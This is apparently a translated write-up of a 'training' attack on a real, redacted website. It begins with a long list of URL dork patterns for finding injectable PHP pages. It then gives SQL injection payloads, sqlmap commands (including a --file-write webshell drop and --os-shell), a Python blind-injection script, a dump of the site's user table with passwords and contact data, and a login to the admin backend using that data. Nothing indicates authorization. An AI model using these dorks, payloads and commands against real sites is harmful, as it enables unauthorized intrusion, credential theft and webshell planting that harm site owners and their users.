browse/book.php?journalID=</br>
section.php?section=</br>
bookDetails.php?id=</br>
profiles/profile.php?profileid=</br>
event.php?id=</br>
gallery.php?id=</br>
category.php?CID=</br>
corporate/newsreleases_more.php?id=</br>
print.php?id=</br>
view_items.php?id=</br>
more_details.php?id=</br>
county-facts/diary/vcsgen.php?id=</br>
idlechat/message.php?id=</br>
podcast/item.php?pid=</br>
products.php?act=</br>
details.php?prodId=</br>
socsci/events/full_details.php?id=</br>
ourblog.php?categoryid=</br>
mall/more.php?ProdID=</br>
archive/get.php?message_id=</br>
review/review_form.php?item_id=</br>
english/publicproducts.php?groupid=</br>
news_and_notices.php?news_id=</br>
rounds-detail.php?id=</br>
gig.php?id=</br>
board/view.php?no=</br>
index.php?modus=</br>
news_item.php?id=</br>
rss.php?cat=</br>
products/product.php?id=</br>
details.php?ProdID=</br>
els_/product/product.php?id=</br>
store/description.php?iddesc=</br>
socsci/news_items/full_story.php?id=</br>
modules/forum/index.php?topic_id=</br>
feature.php?id=</br>
products/Blitzball.htm?id=</br>
profile_print.php?id=</br>
questions.php?questionid=</br>
html/scoutnew.php?prodid=</br>
main/index.php?action=</br>
********.php?cid=</br>
********.php?cid=</br>
news.php?type=</br>
index.php?page=</br>
viewthread.php?tid=</br>
summary.php?PID=</br>
news/latest_news.php?cat_id=</br>
index.php?cPath=</br>
category.php?CID=</br>
index.php?pid=</br>
more_details.php?id=</br>
specials.php?osCsid=</br>
search/display.php?BookID=</br>
articles.php?id=</br>
print.php?sid=</br>
page.php?id=</br>
more_details.php?id=</br>
newsite/pdf_show.php?id=</br>
shop/category.php?cat_id=</br>
shopcafe-shop-product.php?bookId=</br>
shop/books_detail.php?bookID=</br>
index.php?cPath=</br>
more_details.php?id=</br>
news.php?id=</br>
more_details.php?id=</br>
shop/books_detail.php?bookID=</br>
more_details.php?id=</br>
blog.php?blog=</br>
index.php?pid=</br>
prodotti.php?id_cat=</br>
category.php?CID=</br>
more_details.php?id=</br>
poem_list.php?bookID=</br>
more_details.php?id=</br>
content.php?categoryId=</br>
authorDetails.php?bookID=</br>
press_release.php?id=</br>
item_list.php?cat_id=</br>
colourpointeducational/more_details.php?id=</br>
index.php?pid=</br>
download.php?id=</br>
shop/category.php?cat_id=</br>
i-know/content.php?page=</br>
store/index.php?cat_id=</br>
product.php?pid=</br>
showproduct.php?prodid=</br>
product.php?productid=</br>
productlist.php?id=</br>
index.php?pageId=</br>
productlist.php?tid=</br>
product-list.php?id=</br>
onlinesales/product.php?product_id=</br>
garden_equipment/Fruit-Cage/product.php?pr=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
productlist.php?tid=</br>
showsub.php?id=</br>
productlist.php?fid=</br>
products.php?cat=</br>
products.php?cat=</br>
product-list.php?id=</br>
product.php?sku=</br>
store/product.php?productid=</br>
products.php?cat=</br>
productList.php?cat=</br>
product_detail.php?product_id=</br>
product.php?pid=</br>
products.php?categoryID=</br>
modules.php?****=</br>
message/comment_threads.php?postID=</br>
artist_art.php?id=</br>
products.php?cat=</br>
index.php?option=</br>
ov_tv.php?item=</br>
index.php?lang=</br>
showproduct.php?cat=</br>
index.php?lang=</br>
product.php?bid=</br>
product.php?bid=</br>
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=</br>
item_show.php?lid=</br>
?pagerequested=</br>
downloads.php?id=</br>
print.php?sid=</br>
print.php?sid=</br>
product.php?intProductID=</br>
productList.php?id=</br>
product.php?intProductID=</br>
more_details.php?id=</br>
more_details.php?id=</br>
books.php?id=</br>
index.php?offs=</br>
mboard/replies.php?parent_id=</br>
Computer Science.php?id=</br>
news.php?id=</br>
pdf_post.php?ID=</br>
reviews.php?id=</br>
art.php?id=</br>
prod.php?cat=</br>
event_info.php?p=</br>
view_items.php?id=</br>
home.php?cat=</br>
item_book.php?CAT=</br>
www/index.php?page=</br>
schule/termine.php?view=</br>
goods_detail.php?data=</br>
wiki/pmwiki.php?page****=</br>
summary.php?PID=</br>
productlist.php?grpid=</br>
cart/product.php?productid=</br>
db/CART/product_details.php?product_id=</br>
ProductList.php?id=</br>
products/product.php?id=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
product_ranges_view.php?ID=</br>
cei/cedb/projdetail.php?projID=</br>
products.php?DepartmentID=</br>
product.php?shopprodid=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
index.php?news=</br>
education/content.php?page=</br>
Interior/productlist.php?id=</br>
storemanager/contents/item.php?page_code=</br>
view_items.php?id=</br>
customer/board.htm?mode=</br>
help/com_view.html?code=</br>
n_replyboard.php?typeboard=</br>
eng_board/view.php?T****=</br>
prev_results.php?prodID=</br>
bbs/view.php?no=</br>
gnu/?doc=</br>
zb/view.php?uid=</br>
global/product/product.php?gubun=</br>
m_view.php?ps_db=</br>
naboard/memo.php?bd=</br>
bookmark/mybook/bookmark.php?bookPageNo=</br>
board/board.html?table=</br>
kboard/kboard.php?board=</br>
order.asp?lotid=</br>
english/board/view****.php?code=</br>
goboard/front/board_view.php?code=</br>
bbs/bbsView.php?id=</br>
boardView.php?bbs=</br>
eng/rgboard/view.php?&bbs_id=</br>
product/product.php?cate=</br>
content.php?p=</br>
page.php?module=</br>
?pid=</br>
bookpage.php?id=</br>
二、Four targets were finally shortlisted:
- https:xxxxxicsp.tw/about.php?id=2
- http://xxxxcom/about.php?cid=16
- http://xxxxx/search.php?ss=office/about.php?cartID=1.)),,..)%27
- http://wwwxxxxx/about.php?id=37
Pick one and start. I chose the last one.
First probe: id=1' and 1=1%23. The error page leaked a filesystem path, so my first guess was a string-type (quoted) injection:
/data/home/xxxxxxxxx2341xxx085/htdocs/ /newsContentView.php
A path of this shape means the host is Linux.
This is where things got strange. Several oddities:
- Any malformed input redirects to the homepage and shows the error from the screenshot above.
- The usual tests could not tell whether the injection was string-type or numeric.
- After repeated testing, only id=4 seemed to respond to sleep()-based and boolean blind payloads.
- When sqlmap ran it first dumped a long block of \x.. garbage, then asked whether to check the id parameter for a false positive. What was that about?
- Testing the column count with ORDER BY: 2, 3, 4, 5, 8 and 9 all returned true, but ORDER BY 999 produced an error:
This means that any ORDER BY index less than or equal to the real column count renders normally, while any index greater than it produces the error above. Bisecting between a working and a failing index pins the count exactly: ORDER BY 25 works and ORDER BY 26 fails, so the query has 25 columns.
sqlmap references: https://wwwblogs/waw/p/10828237.html and http://www.vuln/1992
I had planned to use my own blind-injection script, but why not just use sqlmap?
No screenshots from here on: I was working inside Kali and VMware Tools was broken, so only the commands and results are recorded.
sqlmap options used (flag names corrected to what sqlmap actually accepts):
- -u URL: target URL
- --current-db: the database the site is currently using (there is no --current-dbs)
- --dbs: enumerate all databases
- --current-user: current database user
- --users: enumerate all database users
- --is-dba: whether the current user has DBA (root-equivalent) privileges
- --delay=SECS: seconds to wait between requests
- --time-sec=SECS: seconds the injected sleep() waits in time-based blind tests (default 5)
- --threads=N: concurrent requests; the default is 1 and the maximum is 10
- --os-shell: interactive operating-system shell (on MySQL this needs the FILE privilege and a directory that is both writable by the DBMS and reachable over the web)
id=4 and sleep(5)%23 works.
Bisection: ?id=4 and length(database())>8%23 is true, so the database name is longer than 8 characters.
On my own machine I had run --dbs (all database names) without --current-db; the first result is information_schema, 18 characters long, so I worried the current database might turn out to be that one:
Compare the two screenshots above: the first is the boolean-false response, the second is true.
For the real run I added --delay, WAF identification, --technique=B (boolean-based blind), --current-db, and set --threads=1.
File options:
--file-read=PATH reads a file from the back-end file system; PATH must be absolute.
--file-write=LOCAL --file-dest=REMOTE writes the local file LOCAL to the absolute path REMOTE on the back-end server (under the web root if you want a shell), for example:
sqlmap -u "http://www.xxxxx/test.php?p=2" --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2
sqlmap reported the target's MySQL version as above 5.0, then complained that a single thread was too slow and asked whether to re-detect or retry; I kept feeding it its favourite --threads=1. After a long wait the first letter of the current database name, "b", appeared, and only then was I fairly sure I should be able to write a shell (PHP 5.2.17 on Apache; nothing else of note).
With the current database name in hand, I tried --os-shell next to see whether I could get a shell. It asks which language the web server supports, then tries to upload its stager: no permission. On MySQL, --os-shell writes its stager with INTO OUTFILE, so without the FILE privilege and a web-reachable directory the DBMS can write to, it cannot work. Now what? Surely /tmp is writable? It could not even read /tmp:
So I fell back to manual injection:
www.xxxxxxxt/about.php?id=4 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%23
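The manual steps above (ORDER BY bisection for the column count, the 25-marker UNION SELECT, and the length(database())>N followed by character-by-character bisection that the boolean-blind sqlmap run performs) in one runnable script. This is an added example, not code from the original write-up, and it never touches the real target: the same payloads are run against an in-memory SQLite table that stands in for the site's query. Everything about that table is constructed (a news table with 25 columns, a database name bdm_demo_db in place of the redacted bdm2266XXXXX). Two MySQL builtins the payloads rely on, database() and ascii(), are registered as SQLite user functions, and the comment terminator is "-- " rather than the post's %23 (a URL-encoded "#") because SQLite has no "#" comment.

```python
"""Boolean-blind SQL injection against a simulated about.php?id= endpoint.

Added example, not the original author's code. SQLite stands in for MySQL;
the table, rows and database name below are all constructed.
"""
import sqlite3

DB_NAME = "bdm_demo_db"   # constructed stand-in for the redacted bdm2266XXXXX
NUM_COLS = 25             # the column count the write-up eventually found


def build_vulnerable_db() -> sqlite3.Connection:
    """Create a 25-column table (id plus 24 text columns) with a few rows."""
    conn = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i} TEXT" for i in range(2, NUM_COLS + 1))
    conn.execute(f"CREATE TABLE news (id INTEGER PRIMARY KEY, {extra})")
    marks = ",".join("?" * NUM_COLS)
    for row_id in range(1, 6):
        values = [row_id] + [f"row{row_id}_col{j}" for j in range(2, NUM_COLS + 1)]
        conn.execute(f"INSERT INTO news VALUES ({marks})", values)
    # MySQL builtins used by the payloads, emulated for SQLite.
    conn.create_function("database", 0, lambda: DB_NAME)
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    return conn


def make_oracle(conn: sqlite3.Connection):
    """Return page(id_param) -> bool that mimics the target: the id parameter is
    concatenated into the query (the injection bug). True means the page
    rendered a row; False means no row OR a SQL error, because the target
    answered both with a redirect to the homepage and an error banner."""
    counter = {"requests": 0}

    def page(id_param: str) -> bool:
        counter["requests"] += 1
        sql = f"SELECT * FROM news WHERE id={id_param}"   # vulnerable by design
        try:
            return conn.execute(sql).fetchone() is not None
        except sqlite3.OperationalError:
            return False

    page.counter = counter
    return page


def find_column_count(oracle, hi: int = 128) -> int:
    """Bisect ORDER BY n: n <= real column count renders, n above it errors
    (the write-up saw ORDER BY 2..9 true and ORDER BY 999 fail)."""
    lo = 1                           # ORDER BY 1 is always valid
    if oracle(f"4 order by {hi} -- "):
        raise ValueError("upper bound too small: ORDER BY %d still works" % hi)
    while hi - lo > 1:               # invariant: lo works, hi errors
        mid = (lo + hi) // 2
        if oracle(f"4 order by {mid} -- "):
            lo = mid
        else:
            hi = mid
    return lo


def union_payload(n: int, base_id: int = 4) -> str:
    """UNION SELECT with n numeric markers, like the manual attempt above.
    A wrong n is a SQL error (page False); the right n renders the markers."""
    return f"{base_id} union select {','.join(str(i) for i in range(1, n + 1))} -- "


def blind_int(oracle, expr: str, lo: int, hi: int, base_id: int = 4) -> int:
    """Recover the integer value of a SQL expression with "expr > mid" probes.
    Invariant: the value lies in [lo, hi]; each probe halves the interval."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{base_id} and ({expr})>{mid} -- "):
            lo = mid + 1
        else:
            hi = mid
    return lo


def dump_database_name(oracle) -> str:
    """length(database()) first, then one ascii(substr()) bisection per character."""
    length = blind_int(oracle, "length(database())", 0, 64)
    return "".join(
        chr(blind_int(oracle, f"ascii(substr(database(),{i},1))", 0, 127))
        for i in range(1, length + 1)
    )


if __name__ == "__main__":
    conn = build_vulnerable_db()
    oracle = make_oracle(conn)
    print("baseline true/false:", oracle("4 and 1=1 -- "), oracle("4 and 1=2 -- "))
    cols = find_column_count(oracle)
    print("columns:", cols,
          "| union with", cols, "markers:", oracle(union_payload(cols)),
          "| with", cols - 1, ":", oracle(union_payload(cols - 1)))
    print("database():", dump_database_name(oracle))
    print("requests used:", oracle.counter["requests"])
```

Every probe costs one request, and bisection keeps that at about log2(range) per value (seven requests per character plus the length search), which is why the boolean technique at --threads=1 with a --delay feels so slow. The time-based check (id=4 and sleep(5)) uses exactly the same bisection; only the oracle changes, reading response time instead of page content.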
Still nothing, so back to the drawing board. I am not DBA and there is no directory I can write a webshell into, so change approach: brute-force directories, look through the tables for a login, log in and use the admin's file upload to get a shell. The usable directory the scan turned up:
    [17:12:21] 403 - 206B - /inc/
4.1 Useful information 1
ftp.txt reads:
Host management console xxxxxx8
xxxxxxx.57
4.2 Useful information 2
DreamWeaver
4.3 Useful information 3
Only two databases: information_schema and bdm2266XXXXX. The second is clearly the site's own, with these tables:
    Database: xxxxx_db
    [9 tables]
    +------------------+
    | user             |
    | gplat_book       |
    | gplat_news       |
    | gplat_newsclass  |
    | gplat_newsclass2 |
    | href             |
    | job              |
    | job_add          |
    | lawyer_wenda     |
    +------------------+
The user table holds the users' ids, addresses, passwords and so on:
    +----------+--------------+
    | Column   | Type         |
    +----------+--------------+
    | adder    | varchar(8)   |
    | admin    | int(2)       |
    | email    | varchar(60)  |
    | grade    | varchar(12)  |
    | id       | int(6)       |
    | image    | varchar(70)  |
    | name     | varchar(60)  |
    | pass     | varchar(60)  |
    | phone    | varchar(14)  |
    | qianming | varchar(100) |
    | times    | datetime     |
    | up_time  | datetime     |
    | xingb    | varchar(2)   |
    +----------+--------------+
Then I logged in with what was in it.
Fingerprinting showed the upload component was FCKeditor, but this version could not be exploited to get a shell. So this exercise ended in failure.
Related post: 2021-08-28 web training homework 2 (real-world SQL injection attempting getshell, Google hacking, account information from the database used to log in to the admin backend, FCKeditor upload)